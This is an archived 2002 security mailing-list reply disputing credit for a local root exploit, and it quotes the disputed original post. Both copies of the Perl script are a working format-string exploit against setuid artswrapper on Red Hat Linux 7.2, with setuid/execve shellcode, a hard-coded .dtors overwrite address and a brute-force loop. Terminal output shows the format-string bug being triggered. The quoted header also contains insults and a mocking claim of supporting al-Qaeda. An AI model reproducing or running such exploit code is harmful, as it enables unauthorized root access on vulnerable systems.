Re: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT

From: KF (dotslashat_private)
Date: Wed Jun 12 2002 - 22:24:39 PDT


    Heh looks like I fell asleep on releasing this one... and it looks like the
    posted code was actually code from our labs (credit where it's due
    please)... just so you are aware the issue is really in artsd which is NOT
    suid ... you should get a shell with your own privs... Here's where that code
    really came from....
    
    [root@ghetto dotslash]# artswrapper -a %x
    >> running as realtime process now (priority 50)
    Error while initializing the sound driver:
    unable to select 'bffffa40' style audio I/O
    [root@ghetto dotslash]# ls -al `which artswrapper`
    -rwsr-sr-x    1 root     root         4136 Sep  8  2001 /usr/bin/artswrapper
    [root@ghetto dotslash]# ls -al `which artsd`
    -rwxr-xr-x    1 root     root       115284 Sep  8  2001 /usr/bin/artsd
    [root@ghetto dotslash]# artsd -a %x
    Error while initializing the sound driver:
    unable to select 'bffffa80' style audio I/O
    
    
    [dotslash@ghetto dotslash]$ cat /etc/hackme/done/artswrapex.pl
    #!/usr/bin/perl
    
    ## ---/ artswrapex.pl /------------------------------------------------
    ##
    ## /usr/bin/artswrapper local format string exploit
    ##   * tested on Red Hat Linux release 7.2 (Enigma)
    ##   * Jun 17 2002
    ##
    ## Author: stringz // thcat_private
    ##
    ## Developed on the Snosoft Cerebrum test bed. - http://www.snosoft.com
    ##
    ## Greets: g463, syphix, S (super), KF, vacuum, dageshi, sozni,
    ##         obscure, jove, rachel, kevin, and all of my 2e2h friends.
    ##
    ## ---/ powered by pot /-----------------------------------------------
    
    # setuid + execve shellcode
    # The bytes decode as the inline mnemonics state: int 0x80 with al = 0x17
    # (Linux/x86 setuid, ebx zeroed) and then with al = 0x0b (execve).  The two
    # pushed dwords are the ASCII bytes "//sh" and "/bin", so ebx ends up
    # pointing at the NUL-terminated string "/bin//sh".
    $kode =
      "\x31\xdb".                 # xor ebx, ebx
      "\xf7\xe3".                 # mul ebx
      "\xb0\x17".                 # mov al, 0x17
      "\xcd\x80".                 # int 0x80
      "\x31\xc0".                 # xor  eax, eax
      "\x99".                     # cdq
      "\x52".                     # push edx
      "\x68\x2f\x2f\x73\x68".     # push dword 0x68732f2f
      "\x68\x2f\x62\x69\x6e".     # push dword 0x6e69622f
      "\x89\xe3".                 # mov  ebx, esp
      "\x52".                     # push edx
      "\x53".                     # push ebx
      "\x89\xe1".                 # mov  ecx, esp
      "\xb0\x0b".                 # mov  al, 0x0b
      "\xcd\x80";                 # int  0x80
    
    # $vuln  = the setuid-root wrapper shown in the ls -al output above.
    # $dtors = the write target, a hard-coded address in the Red Hat 7.2 build
    #          named in the header; it is specific to that binary and is
    #          meaningless elsewhere.  The doubled ';' is a harmless empty
    #          statement.  All of these are package globals: the script has no
    #          'use strict'/'use warnings'.
    $vuln    = "/usr/bin/artswrapper";
    $dtors   = 0x8049a7c + 4;;
    
    printf("\n-- /usr/bin/artswrapper local format string exploit\n");
    printf("-- stringz // thc\@drug.org\n\n");
    
    # Value to be written at $dtors: a fixed guess of where the shellcode
    # string will sit.  0xc0000000 is the classic 32-bit Linux user-space
    # ceiling; the subtractions account for the program path and the single
    # environment string set below, each NUL-terminated.  NOTE(review): the
    # stack layout is assumed, not measured, and the loop below does not
    # adjust it (it only varies the format-parameter index); with stack
    # randomization a fixed guess like this no longer holds.
    $ret_addr = 0xc0000000 - 4
        - (length($vuln) + 1)
        - (length($kode) + 1)
        ;
    
    # Empty the environment so the shellcode is the only environment string
    # the child inherits; the key name is arbitrary.
    undef(%ENV); $ENV{'1337'} = $kode;
    
    printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr);
    printf("bruteforcing distance (1 .. 300)\n");
    sleep(2);
    
    # Try positional indices 1..300 for the %hn writes.  system() returns the
    # 16-bit wait status (exit code << 8), so the regex matches exit 0, 1, 2
    # or 127 and any other status moves on to the next index.  die() with a
    # message ending in "\n" prints just that newline, with no "at ... line"
    # suffix, and ends the script.
    for (1 .. 300) {
        $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
        die("\x0a") if (system("$vuln -a $fmt_str"))
            =~ m/^(0|256|512|32512)$/; # may need a tweak ;)
    }
    
    # sw_fmtstr_create($dest_addr, $ret_addr, $dist)
    #   Builds the format string for one attempt: two positional %hn writes
    #   that store the 32-bit $ret_addr at $dest_addr as two 16-bit halves.
    #   $dest_addr = address of the 4-byte slot to write
    #   $ret_addr  = the 32-bit value to store there
    #   $dist      = positional index used by the first %hn; the second uses
    #                $dist + 1
    # Returns the string produced by the trailing sprintf (the sub's last
    # expression).  Dies unless exactly three arguments were passed.
    # Note: the ($$$) prototype is declared after the call site at the top of
    # the file, so it is not in effect for that call (perl would warn "called
    # too early to check prototype" if warnings were enabled).
    sub
    sw_fmtstr_create ($$$)
    {
        die("Incorrect number of arguments for sw_fmtstr_create")
            unless @_ == 3;
    
        my ($dest_addr, $ret_addr, $dist) = @_;
        # $word  = offset of the upper half within a little-endian 32-bit slot
        # $qword = bytes already emitted by the two packed addresses (2 x 4)
        my ($word, $qword) = (2, 8);
    
        # $dest_addr = where to write $ret_addr
        # $ret_addr  = where to return execution
        # $dist      = the calculated distance
    
        # Upper and lower 16-bit halves of the value.  These and $high/$low/
        # $dest_addr1/$dest_addr2 are package globals (no 'use strict').
        $tmp1  = (($ret_addr >> 16) & 0xffff);
        $tmp2  = $ret_addr & 0xffff;
    
        # A %hn stores the running output length, which only grows, so the
        # smaller half is written first.  $high and $low are the %u field
        # widths that bring the running count up to each half in turn, and
        # $dest_addr1/$dest_addr2 are the matching slot addresses packed as
        # native 32-bit ('L'; little-endian on the x86 target).
        if ($tmp1 < $tmp2) {
            $high = $tmp1 - $qword;
            $low  = $tmp2 - $high - $qword;
    
            $dest_addr1 = pack('L', $dest_addr + $word);
            $dest_addr2 = pack('L', $dest_addr);
        }
        else {
            $high = $tmp2 - $qword;
            $low  = $tmp1 - $high - $qword;
    
            $dest_addr1 = pack('L', $dest_addr);
            $dest_addr2 = pack('L', $dest_addr + $word);
        }
    
        # Layout: the two 4-byte addresses (%.4s each), then a width-padded %u
        # and a positional %hn for each half.  '%%' and '\$' are sprintf/Perl
        # escapes so that literal '%' and '$' appear in the result.
        sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn",
                $dest_addr1, $dest_addr2, $high, $dist,
                $low, $dist + 1);
    }
    
    -KF
    
    
    ----- Original Message -----
    From: "kanix THE HACKER" <kanixat_private>
    To: <bugtraqat_private>; <vulnwatchat_private>;
    <vuln-devat_private>; <submissionsat_private>
    Sent: Saturday, July 06, 2002 3:45 PM
    Subject: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT
    
    
    > Greetings,
    >
    > This is a local exploit for a format string vulnerability in
    > /usr/bin/artswrapper on Red Hat Linux release 7.2 (Enigma).
    >
    > Sincerely,
    >
    > kanix
    >
    
    
    ----------------------------------------------------------------------------
    ----
    
    
    > #!/usr/bin/perl
    >
    > ########################################################################
    > #
    > # fartsy.pl by kanix <kanixat_private>
    > # /usr/sbin/artswrapper <local format string exploit>
    > # Tested on Red Hat Linux release 7.2 (Enigma)
    > #
    > # Jul 6, 2002
    > #
    > # "the secret to creativity is knowing how to hide your sources."
    > # - Albert Einstein
    > #
    > # commentz, job offerz, flamez, etc. should be directed to my e-mail
    > # address -- I WILL SCHOOL YOU ALL.
    > #
    > # SCREW THE USA! FEAR THE POWER OF .NO !@#$%!
    > # official supporter of the al-Qaeda Terrorist Network.
    > #
    > # BURN, BABY, BURN!!!
    > #
    > # I 0xc0ded this for fun and profit... and to get scene whorez. ;>
    > #
    > # This code is far from special - my mother could have written it,
    > # however, that is the extent of my ability.
    > #
    > # I can code sploits, but I know nothing of UNC file sharing! I'm
    > # still very 0x1337. I mean, I can code exploits, that's what makes
    > # you a hacker!
    > #
    > # SPECIAL NOTE TO SCRIPT KIDDIEZ: go get a playstation or something,
    > # there are enuff retardz in the hacker scene already (LIKE ME ;>)!
    > #
    > # Greetz: #!digit-labs, #0xfee1dead, #rootless, #!GOBBLES, synnergy,
    > #         security.is, #hackphreak, teleh0r (fame seeking whore like
    > #         me!), worldsex.com, badpack3t (no 0day for j00!), TEAM TESO
    > #         AND ALL OTHER FANZ OF THE DMCA (COPYRIGHT THIS, BITCH!@#$%!)
    > #
    > # kanix: I know how the stack werkz... I AM A HACKER. OK??!?!!!
    > #
    > # kanix: can some1 pleeze tell me about DNS cache poisoning?
    > #
    > ########################################################################
    >
    > $kode =
    >   "\x31\xdb".                 # xor ebx, ebx
    >   "\xf7\xe3".                 # mul ebx
    >   "\xb0\x17".                 # mov al, 0x17
    >   "\xcd\x80".                 # int 0x80
    >   "\x31\xc0".                 # xor  eax, eax
    >   "\x99".                     # cdq
    >   "\x52".                     # push edx
    >   "\x68\x2f\x2f\x73\x68".     # push dword 0x68732f2f
    >   "\x68\x2f\x62\x69\x6e".     # push dword 0x6e69622f
    >   "\x89\xe3".                 # mov  ebx, esp
    >   "\x52".                     # push edx
    >   "\x53".                     # push ebx
    >   "\x89\xe1".                 # mov  ecx, esp
    >   "\xb0\x0b".                 # mov  al, 0x0b
    >   "\xcd\x80";                 # int  0x80
    >
    > $vuln    = "/usr/bin/artswrapper";
    > $dtors   = 0x8049a7c + 4;; # I overwrite .dtors! (patent pending)
    >
    > printf("\n-- /usr/bin/artswrapper local format string exploit\n");
    > printf("\t by kanix <kanix\@0xfee1dead.net>\n\n");
    >
    > $ret_addr = 0xc0000000 - 4
    >     - (length($vuln) + 1)
    >     - (length($kode) + 1)
    >     ;
    >
    > undef(%ENV); $ENV{'1337'} = $kode;
    >
    > printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr);
    > printf("bruteforcing distance (1 .. 300)\n");
    > sleep(2);
    >
    > for (1 .. 300) {
    >     $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
    >     die("\x0a") if (system("$vuln -a $fmt_str"))
    >         =~ m/^(0|256|512|32512)$/;
    > }
    >
    > sub
    > sw_fmtstr_create ($$$)
    > {
    >     die("Incorrect number of arguments for sw_fmtstr_create")
    >         unless @_ == 3;
    >
    >     my ($dest_addr, $ret_addr, $dist) = @_;
    >     my ($word, $qword) = (2, 8);
    >
    >     $tmp1  = (($ret_addr >> 16) & 0xffff);
    >     $tmp2  = $ret_addr & 0xffff;
    >
    >     if ($tmp1 < $tmp2) {
    >         $high = $tmp1 - $qword;
    >         $low  = $tmp2 - $high - $qword;
    >
    >         $dest_addr1 = pack('L', $dest_addr + $word);
    >         $dest_addr2 = pack('L', $dest_addr);
    >     }
    >     else {
    >         $high = $tmp2 - $qword;
    >         $low  = $tmp1 - $high - $qword;
    >
    >         $dest_addr1 = pack('L', $dest_addr);
    >         $dest_addr2 = pack('L', $dest_addr + $word);
    >     }
    >
    >     sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn",
    >             $dest_addr1, $dest_addr2, $high, $dist,
    >             $low, $dist + 1);
    > }
    >
    


